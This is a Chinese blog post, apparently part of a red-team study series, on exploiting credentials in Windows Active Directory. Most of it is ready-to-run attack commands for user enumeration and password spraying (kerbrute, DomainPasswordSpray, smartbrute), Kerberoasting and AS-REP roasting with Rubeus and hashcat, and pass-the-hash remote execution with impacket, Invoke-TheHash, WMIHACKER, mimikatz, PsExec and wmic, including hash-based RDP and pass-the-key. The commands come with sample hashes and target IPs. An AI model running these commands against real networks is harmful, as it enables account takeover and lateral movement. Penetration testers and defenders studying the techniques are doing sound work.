红队知识体系梳理2-凭据利用

已于 2023-09-05 11:24:37 修改
阅读量226 收藏
点赞数
分类专栏: 域渗透 文章标签: python linux 运维 网络安全 windows
于 2023-03-09 14:58:04 首次发布
仅供学习,未经许可不得擅自转载
本文链接:https://blog.csdn.net/weixin_42282667/article/details/129422965
版权

二.凭据利用

通过暴力破解方式获取用户凭证,利用已有凭证进行横向扩展

2.1 爆破凭据

密码喷洒

通过Kerberos枚举用户,获得有效域账户凭据

#通过Kerberos枚举用户名
kerbrute userenum -d qaq.com  --dc 192.168.10.250 usernames.txt
#指定密码喷洒
kerbrute  passwordspray -d qaq.com  --dc 192.168.10.250  domain_users.txt Password123
#指定账户密码暴破(会被锁账户)
kerbrute_linux_amd64 bruteuser -d qaq.com  --dc 192.168.10.250  passwords.lst  test

#获得所有用户的列表,排除被禁用和被锁定的用户
powershell  -exec bypass -command "&{import-module .\DomainPasswordSpray.ps1; Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts| Out-File -Encoding ascii userlist.txt }"

#指定UserList进行密码喷洒暴破
Invoke-DomainPasswordSpray -UserList .\\users.txt -Password Aa123456 -Verbose

#利用LDAP自动从域中导出用户列表(去除禁用和锁定用户),再进行密码喷洒
powershell  -exec bypass -command "&{import-module .\DomainPasswordSpray.ps1;Invoke-DomainPasswordSpray -Password Aa123456}"
  • smartbrute

支持使用NTLM-hash爆破
smartbrute

#smart模式。通过LDAP获取启用的用户,获取用户锁定策略后进行爆破。爆破不会锁定账户
python3 smartbrute.py smart -bP passwords.txt kerberos -d  qaq.com  -u admin -p 'Aa123456' kerberos
python3 smartbrute.py smart -bH NT_hash_passwords.txt kerberos -d  qaq.com  -u admin -p 'Aa123456' kerberos

#Brute模式。会锁定用户
python3 smartbrute.py brute -bu 'jack' -bP passwords.txt kerberos -d qaq.com

Kerberoasting

爆破kerberos第二步TGS认证票据,获取高权限服务的密码

在域里,请求高权限服务的票据后进行离线爆破,服务账号是机器账号无法爆破成功

Rubeus.exe kerberoast #生成所有高权限服务的ST
hashcat64.exe -m 13100 hash.txt pass.txt -o result.txt --force  #13100表示RC4-HMAC-MD5加密

也可使用kerberoast项目tgsrepcrack.py脚本爆破RC4-HMAC-MD5类型的ST票据

AS-REPRoasting

爆破kerberos第一步as认证的sessionkey-TGS。sessionkey-TGS是由用户hash加密

请求生成不需要kerberos预身份认证的账户ST,然后离线爆破sessionkey-TGS,获取有效域账户密码

Rubeus.exe asreproast > hash.txt  #生成不需要域认证账户的ST。通过LDAP查询不需要kerberos预身份认证的账户
Rubeus.exe asreproast /domain:qaq.org /user:admin /dc:172.16.0.106 /format:hashcat /outfile:C:\Temp\hash.txt  #非域内生成admin账户的ST

hashcat64.exe -m 18200 hash.txt pass.txt --force   #爆破sessionkey-TGS值

2.2 PTH

dump lsass进程获取到NTLM-hash、aes256-hmac-hash或明文后,或用当前用户票据凭证,进行hash传递攻击访问其他机器

PTH

  • 利用impacket套件
#-hashes Lmhash:ntlmhash

python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:47bf8039a8506cd67c524a03ff84ba4e  administrator@192.168.4.27   "ipconfig"
python smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:47bf8039a8506cd67c524a03ff84ba4e  administrator@192.168.4.27

#通过wmic方式执行命令
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:47bf8039a8506cd67c524a03ff84ba4e  administrator@192.168.4.27   "ipconfig"
  • Invoke-TheHash

https://github.com/Kevin-Robertson/Invoke-TheHash

#WMI方式135端口无回显批量执行命令
powershell -exec bypass  "&{import-module .\Invoke-TheHash.ps1; import-module .\Invoke-WMIExec.ps1;Invoke-TheHash -Type WMIExec -Target 192.168.10.1/24 -Domain qaq.com  -Username administrator -Hash 47bf8039a8506cd67c524a03ff84ba4e  -Command "whoami" -verbose}"

powershell -exec bypass  "&{import-module .\Invoke-WMIExec.ps1; Invoke-WMIExec -Target 192.168.10.250 -Domain qaq.com -Username administrator -Hash 47bf8039a8506cd67c524a03ff84ba4e -Command "hostname" -verbose}"

#SMB方式445端口批量无回显批量执行命令
powershell -exec bypass  "&{import-module .\Invoke-TheHash.ps1; import-module .\Invoke-SMBExec.ps1; Invoke-TheHash -Type  smbexec -Target 192.168.10.1/24 -Domain qaq.com  -Username administrator -Hash 47bf8039a8506cd67c524a03ff84ba4e  -Command "whoami" -verbose}"

powershell -exec bypass  "&{import-module .\Invoke-SMBExec.ps1;  invoke-smbexec -Target 192.168.10.250 -Domain qaq.com  -Username administrator -Hash 47bf8039a8506cd67c524a03ff84ba4e  -Command "whoami" -verbose}"

#WMI方式135端口执行命令,注册表获取结果
python3 wmiexec-regOut.py   qaq/administrator:Aa123456@192.168.10.250  'whoami'
python3 wmiexec-regOut.py  -hashes aad3b435b51404eeaad3b435b51404ee:47bf8039a8506cd67c524a03ff84ba4e qaq/administrator@192.168.10.250 'whoami'

#WMI方式135端口无回显执行命令,vbs调用
python3 wmipersist-Modify.py  qaq/administrator:Aa123456@192.168.10.250  'whoami'
python3 wmipersist-Modify.py    -hashes aad3b435b51404eeaad3b435b51404ee:47bf8039a8506cd67c524a03ff84ba4e qaq/administrator@192.168.10.250 'whoami'

#WMI方式135端口回显执行命令,vbs调用
python3  wmipersist-Modify.py qaq/administrator:Aa123456@192.168.10.250  'whoami'  -with-output
python3   wmipersist-Modify.py    -hashes aad3b435b51404eeaad3b435b51404ee:47bf8039a8506cd67c524a03ff84ba4e qaq/administrator@192.168.10.250   'whoami'   -with-output
  • WMIHACKER
    WMIHACKER
    WMIHACKER用的是135端口,wmic方式执行命令
#有命令回显执行方式
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1

#无命令回显
 cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0

#模拟shell模式
cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!" 

#使用hash进行认证,需要先创建访问令牌
 cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 - - "systeminfo > c:\1.txt" 0
  • mimikatz
#另外生成进程创建访问令牌
mimikatz "privilege::debug"  "sekurlsa::pth /user:administrator /domain:192.168.4.26 /ntlm:47bf8039a8506cd67c524a03ff84ba4e"
  • 微软PSTools套件

PsExec.exe -accepteula \\test5-2012.qaq.org -s cmd.exe #默认使用当前用户的凭据
psexec \\192.168.10.250  -accepteula -u username -p password  -s cmd.exe
  • windows wmic
wmic /node:test.qaq.com  process call create  "cmd.exe /c whoami > c:\\windows\temp\test.txt" #默认使用当前用户凭据
wmic /user:"qaq.com\administrator"  /password:"Aa123456"  /node:test.qaq.com  process call create  "cmd.exe /c whoami > c:\\windows\temp\test.txt"

type \\test.qaq.com\c$\windows\temp\test.txt

hash登录RDP

安装KB2871997补丁后支持使用NTLM或kerberos票据登录RDP,2012 R2后自带受限管理员模式。安装KB2973351补丁会临时关闭功能

#开启受限管理员模式
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
#查询是否开启,0表示开启
REG query HKLM\System\CurrentControlSet\Control\Lsa | findstr DisableRestrictedAdmin

注意管理员组成员有效,客户端和服务端都需支持Restricted Admin mode

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:. /ntlm:47bf8039a8506cd67c524a03ff84ba4e"
mstsc.exe /restrictedadmin

2.5 ptk

使用aes256-hmac hash进行kerberos PTH,目标主机需要安装补丁kb2871997,默认2012 r2+自带

#获取aes256-hmac hash
mimikatz.exe "privilege::debug" "sekurlsa::ekeys" exit > aes256.txt
#注入aes256-hmac生成票据
mimikatz.exe "sekurlsa::pth /user:administrator /domain:test.qaq.com /aes256:xxxxxxxx" exit

2.6 令牌窃取

当机器被域管登录过,或存在域管进程。此时可以dump lsass进程寻找域管凭证,或注入域管票据,或窃取域管进程令牌

supdon
关注
专栏目录
红队攻防知识分享-被动信息收集
beirry的博客
12-06 3560
信息收集的基本要求 1.全面: 做到对目标所有的业务面和非业务面的存在点进行全面的信息收集。 2.准确: 对于收集到的信息尤其是重要信息要再三确认其信息的准确性,对信息的内容中所涉及的技术点要手动查看。 3.时效: 对于收集到的信息要注意信息产生的时间和收集到的时间,是否具有时间差,时间差能否接受,如果存在失效的信息要及时清除。 4.清晰: 对于收集到的信息要做到逻辑清晰,能清楚地分辨出各个收集到的信息之间的逻辑关系和资产之间的相对位置,对于总体目标要有清晰的资产逻辑和业务逻辑认识。 ...
域渗透—域用户枚举与口令爆破
内心不种满鲜花就会长满杂草
03-24 4432
Kerberos本身是一种基于身份认证的协议,在 Kerberos 协议认证的 第一阶段AS-REQ ,当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击。
内网安全之域内密码喷洒
weixin_45910629的博客
04-06 1084
域内密码喷洒一般和域内用户名枚举一起使用,可以在无域内凭据的情况下,通过枚举出域内存在的用户名,进而对域内存在的用户名进行密码喷洒,以此来获得域内有效凭据。在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。这种针对所有用户的自动密码猜测通常是为了避免账户被锁定,因为如果目标域设置了用户锁定策略的话,针对同一个用户的连续密码猜测会导致账户被锁定。
域渗透-用户枚举和密码喷洒
weixin_43227251的博客
05-06 1221
域渗透-用户枚举和密码喷洒 在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击 域内用户枚举 当主机不在域内时,我们可以通过域内用户枚举来探测域内的用户。 我们可以使用Kerbrute工具进行探测。 工具地址:https://github.com/ropnop/kerbrute kerbrute_windows_amd64.exe
[渗透测试笔记] 20.BrutesPray、metasploit
H4ppyD0g的博客
02-04 655
所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负! BrutesPray BruteSpray基于nmap扫描输出的gnmap/xml文件,自动调用Medusa对服务进行爆破 kali端安装 apt-get install brutespray 常用参数 -f file 解析nmap输出的gnmap或xml文件 -o file 输出文件 -s service 指定要攻击的...
红队知识体系梳理1-域内信息收集
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-09 715
红队知识体系梳理1-域内信息收集
红队知识体系梳理4-relay
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-09 210
红队知识体系梳理4-relay
红队知识体系梳理3-攻击域控制器
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-09 478
红队知识体系梳理3-攻击域控制器
鱼哥赠书活动第③期:《CTF那些事儿》《构建新型网络形态下的网络空间安全体系
2401_85239040的博客
07-20 904
本书不仅讲授了网络空间安全相关的基础知识和操作技能,还探讨了CTF赛题的本质,着重阐述了面对不同类型题目时的分析思路和方法。比如,我们首次提出“图像隐写三板斧”“逆向真经”等解题思维模式,并较为全面地总结了CTF比赛中对工控安全相关知识的考查方式。从线下培训的效果来看,这些方法的实用性极强。《CTF那些事儿》通过喜闻乐见的方式,以通俗易懂、幽默风趣的语言普及网络空间安全的知识,从而提高公众的网络空间安全意识,进而促进全行业水平的提高,为我国成为网络安全强国打下坚实的基础。
红队渗透打点工具-FindUpload
03-07
红队渗透打点工具-FindUpload】 在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
goby-红队专用版-for-Windows
12-15
goby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队...
goby红队&社区版-win-64-2.4.7
11-27
该版本可能包含了一系列高级的扫描策略,如深度包检测、端口扫描、弱口令探测、服务识别等,以帮助红队成员发现并利用目标系统的脆弱性。 另一方面,Goby社区版则面向更广泛的用户群体,包括但不限于网络安全爱好者...
Goby红队版-win-x64-2.4.7版本
07-27
Goby红队专版:集成1500个poc和exp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双击goby.exe运行即可 注意事项: 最新的漏洞不可以在线更新,可自行添加poc和exp 重要的事情说三遍 不要用于非法或未授权...
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
最新发布
haidizym的博客
10-02 485
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python
遥感影像-实例分割数据集:iSAID 从切图到YOLO格式数据集制作详细介绍
GIS潮流
09-30 1293
开源数据集isaid标注包含实例分割,但是原始影像太大,很吃显存,一般显卡无法用原始影像直接训练,所以需要对影像进行裁剪,并生成对应的标签,因为想用yolo系列跑模型,所以将标签需要转为txt格式。
酷炫音乐盒: 使用Python和Tkinter配合Pygame打造自己的音乐播放器
宇宙第一小趴菜的博客
09-29 1243
Tkinter是一个功能强大且简单易用的库,适合构建轻量级的GUI应用程序。它在不同的操作系统上具有相同的外观和行为,因此可以实现跨平台的应用程序。当然,Tkinter还有更多的功能和细节,通过阅读官方文档和教程,你可以更深入地了解和学习如何运用Tkinter来创建各种GUI应用程序。
Python | Leetcode Python题解之第448题找到所有数组中消失的数字
Mopes__的博客
10-01 419
Python | Leetcode Python题解之第448题找到所有数组中消失的数字
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值